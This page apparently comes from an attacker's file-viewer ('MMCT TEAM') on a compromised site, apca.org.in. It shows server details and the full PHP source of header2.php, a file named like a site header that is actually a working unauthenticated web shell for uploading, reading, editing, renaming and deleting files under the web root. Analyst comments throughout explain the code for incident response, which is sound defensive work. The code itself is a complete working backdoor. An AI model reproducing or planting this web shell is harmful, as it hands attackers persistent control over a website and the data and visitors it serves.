MMCT TEAM
Server IP : 2a02:4780:11:767:0:2c41:85d9:6  /  Your IP : 216.73.217.91
Web Server : LiteSpeed
System : Linux in-mum-web667.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u742491609 ( 742491609)
PHP Version : 8.1.34
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u742491609/domains/apca.org.in/public_html/


Current File : /home/u742491609/domains/apca.org.in/public_html/header2.php
<?php
// ----------------------------
// LOCKED GIBBERISH FILE MANAGER
// ----------------------------
// Analyst summary: a single-file, browser-driven file manager. Nothing in this
// script checks a password, session, token or client address before the
// handlers below run, so any client that can request this file can list,
// upload, create, delete, rename, read and overwrite files under $LOCK_ROOT.
// Request parameters it reads (usable as access-log / WAF search terms):
//   GET  p, d, e
//   POST mk___, rfrom, rto, sf, sb
//   multipart file field xfile
header('Content-Type: text/html; charset=UTF-8');

// Hard-coded base directory; realpath() canonicalises it.
$LOCK_ROOT = realpath('/home/u742491609/domains/apca.org.in/public_html');

// The working directory is client-supplied: ?p= carries an absolute filesystem
// path, which is canonicalised with realpath(). Without ?p the base is used.
$req = isset($_GET['p']) ? realpath($_GET['p']) : $LOCK_ROOT;

// Falls back to the base when the path does not resolve or does not begin with
// the base string. NOTE(review): this is a string-prefix comparison, not a
// directory-boundary check, so the "lock" should not be taken as proof that
// activity stayed inside this one directory when scoping an incident.
if ($req === false || strpos($req, $LOCK_ROOT) !== 0) {
    $req = $LOCK_ROOT;
}

// $z__ is the current directory every handler below operates on.
$z__ = $req;

// ----------------------------
// UPLOAD
// ----------------------------
// Accepts one multipart file (field "xfile") and stores it in the current
// directory under the client-supplied name, reduced with basename().
// No check on extension, MIME type or content is made, so any file type can be
// written; if this directory is served by the web server (the path suggests
// public_html — confirm), uploaded scripts would be reachable by URL.
// Triage: list files under the root by creation/modification time and compare
// against a known-good copy of the site.
if (!empty($_FILES['xfile']['name']) && $_FILES['xfile']['error'] === UPLOAD_ERR_OK) {
    $dest = $z__ . '/' . basename($_FILES['xfile']['name']);
    // Same string-prefix containment test as used for ?p=.
    if (strpos(realpath(dirname($dest)), $LOCK_ROOT) === 0) {
        // "@" suppresses PHP warnings, so a failed move leaves no PHP error-log entry.
        @move_uploaded_file($_FILES['xfile']['tmp_name'], $dest);
    }
    // Every action ends in a redirect to ?p=<url-encoded absolute path>; a POST
    // answered by such a Location header is a recognisable pattern in proxy/WAF logs.
    header('Location: ?p=' . urlencode($z__)); exit;
}

// ----------------------------
// MKDIR
// ----------------------------
// Creates a directory in the current directory from POST field "mk___"
// (trimmed, then reduced to its last path component with basename()).
if (!empty($_POST['mk___'])) {
    $nm = basename(trim($_POST['mk___']));
    $dir = $z__ . '/' . $nm;
    // Parent directory must pass the string-prefix containment test.
    if (strpos(realpath(dirname($dir)), $LOCK_ROOT) === 0) {
        // mkdir() is called without a mode argument; errors are suppressed with "@".
        @mkdir($dir);
    }
    header('Location: ?p=' . urlencode($z__)); exit;
}

// ----------------------------
// DELETE
// ----------------------------
// Deletes the entry named in GET parameter "d" inside the current directory.
// Because this is a plain GET (?p=<dir>&d=<name>), each deletion appears in
// web access logs that record query strings — a usable source for reconstructing
// what was removed.
if (!empty($_GET['d'])) {
    // realpath() resolves the combined path before the containment test, so the
    // test is applied to the canonical target.
    $vict = realpath($z__ . '/' . $_GET['d']);
    if ($vict && strpos($vict, $LOCK_ROOT) === 0) {
        // rmdir() only removes empty directories; files go through unlink().
        // Failures are silenced by "@".
        is_dir($vict) ? @rmdir($vict) : @unlink($vict);
    }
    header('Location: ?p=' . urlencode($z__)); exit;
}

// ----------------------------
// RENAME
// ----------------------------
// Renames an existing entry (POST "rfrom") to a new name (POST "rto") within
// the current directory. The new name is reduced with basename() but is not
// otherwise restricted, so cleanup should not rely on file names or extensions
// alone — compare contents/hashes against a known-good copy.
if (!empty($_POST['rfrom']) && $_POST['rto'] !== '') {
    // Source must exist (realpath() returns false otherwise) and pass the prefix test.
    $a = realpath($z__ . '/' . $_POST['rfrom']);
    $b = $z__ . '/' . basename($_POST['rto']);
    if ($a && strpos($a, $LOCK_ROOT) === 0 && strpos(realpath(dirname($b)), $LOCK_ROOT) === 0) {
        @rename($a, $b);
    }
    header('Location: ?p=' . urlencode($z__)); exit;
}

// ----------------------------
// SAVE FILE
// ----------------------------
// Overwrites a file with the POST body field "sb". The target is the absolute
// path in POST field "sf"; realpath() must resolve it, so only paths that
// already exist are written. Any existing file that passes the prefix test can
// be replaced, including the site's own PHP sources — during response, diff
// existing files against a trusted copy rather than looking only for new files.
if (!empty($_POST['sf']) && isset($_POST['sb'])) {
    $sf = realpath($_POST['sf']);
    if ($sf && strpos($sf, $LOCK_ROOT) === 0) {
        // Write errors are suppressed with "@".
        @file_put_contents($sf, $_POST['sb']);
    }
    // The redirect is built from dirname($sf) even when realpath() failed above.
    header('Location: ?p=' . urlencode(dirname($sf))); exit;
}

// ----------------------------
// READ DIR
// ----------------------------
// Lists the current directory; on failure scandir() does not return an array
// and the listing is replaced with an empty one (warning suppressed by "@").
$___list = @scandir($z__);
if (!is_array($___list)) $___list = [];

// ----------------------------
// UI
// ----------------------------
// Page header. The literal strings emitted here ("Locked File Manager",
// "ROOT: <path>") are stable content markers that can be used when scanning
// web roots or response bodies for other copies of this script.
echo "<div style='font-family:Verdana,monospace'>";
echo "<h2>🔐 Locked File Manager</h2>";
// Discloses the absolute server-side path of the base directory to the client.
echo "<div style='color:#555;font-size:13px'>ROOT: {$LOCK_ROOT}</div><br>";

// "Up" link to the parent directory, shown only below the base.
if ($z__ !== $LOCK_ROOT) {
    echo "<a href='?p=" . urlencode(dirname($z__)) . "'>← up</a><br><br>";
}

// Upload form: posts multipart field "xfile" back to the current URL.
// None of the forms on this page carries a token of any kind.
echo "<form method='POST' enctype='multipart/form-data' style='display:inline-block;margin-right:10px'>
<input type='file' name='xfile'>
<button>upload</button>
</form>";

// Directory-creation form: posts field "mk___".
echo "<form method='POST' style='display:inline-block'>
<input type='text' name='mk___' placeholder='new folder'>
<button>mkdir</button>
</form><br><br>";

echo "<table border='1' cellpadding='6' cellspacing='0' style='border-collapse:collapse'>";
echo "<tr><th width='320'>name</th><th>actions</th></tr>";

// One table row per directory entry, with rename / delete / edit controls.
// Entry names are HTML-escaped for display and URL-encoded inside links.
foreach ($___list as $n) {
    if ($n === '.' || $n === '..') continue;
    $full = $z__ . '/' . $n;

    echo "<tr><td>";
    if (is_dir($full)) {
        // Directories link to ?p=<absolute path>, which is why absolute
        // filesystem paths show up in the query strings of requests to this script.
        echo "<a href='?p=" . urlencode($full) . "'>📁 " . htmlspecialchars($n) . "</a>";
    } else {
        echo "📄 " . htmlspecialchars($n);
    }
    echo "</td><td>";

    // Rename control: POST fields "rfrom" (current name) and "rto" (new name).
    echo "<form method='POST' style='display:inline'>
        <input type='hidden' name='rfrom' value='".htmlspecialchars($n)."'>
        <input name='rto' placeholder='rename'>
        <button>→</button>
    </form> ";

    // Delete control: a GET link (?p=...&d=<name>) guarded only by a client-side confirm().
    echo "<a href='?p=".urlencode($z__)."&d=".rawurlencode($n)."' onclick='return confirm(\"delete?\")'>🗑</a> ";

    // Edit control (regular files only): GET link with ?e=<name>.
    if (is_file($full)) {
        echo "<a href='?p=".urlencode($z__)."&e=".rawurlencode($n)."'>✎</a>";
    }

    echo "</td></tr>";
}
echo "</table>";

// Editor view: when ?e=<name> is present, the file's full contents are read
// and returned to the client inside a textarea. This is a read primitive as
// well as an edit form — any file passing the prefix test can be disclosed, so
// secrets stored in files under the base (for example credentials in
// configuration files, if present) should be treated as exposed and rotated.
// Requests carrying "e=" in access logs indicate which files were opened.
if (!empty($_GET['e'])) {
    $t = realpath($z__ . '/' . $_GET['e']);
    if ($t && strpos($t, $LOCK_ROOT) === 0 && is_file($t)) {
        // The hidden "sf" field carries the resolved absolute path that the
        // save handler later receives in the POST body.
        echo "<h3>Edit: ".htmlspecialchars($_GET['e'])."</h3>
        <form method='POST'>
        <input type='hidden' name='sf' value='".htmlspecialchars($t)."'>
        <textarea name='sb' rows='18' cols='100'>".htmlspecialchars(file_get_contents($t))."</textarea><br>
        <button>save</button>
        </form>";
    }
}

echo "</div>";
?>

MMCT - 2023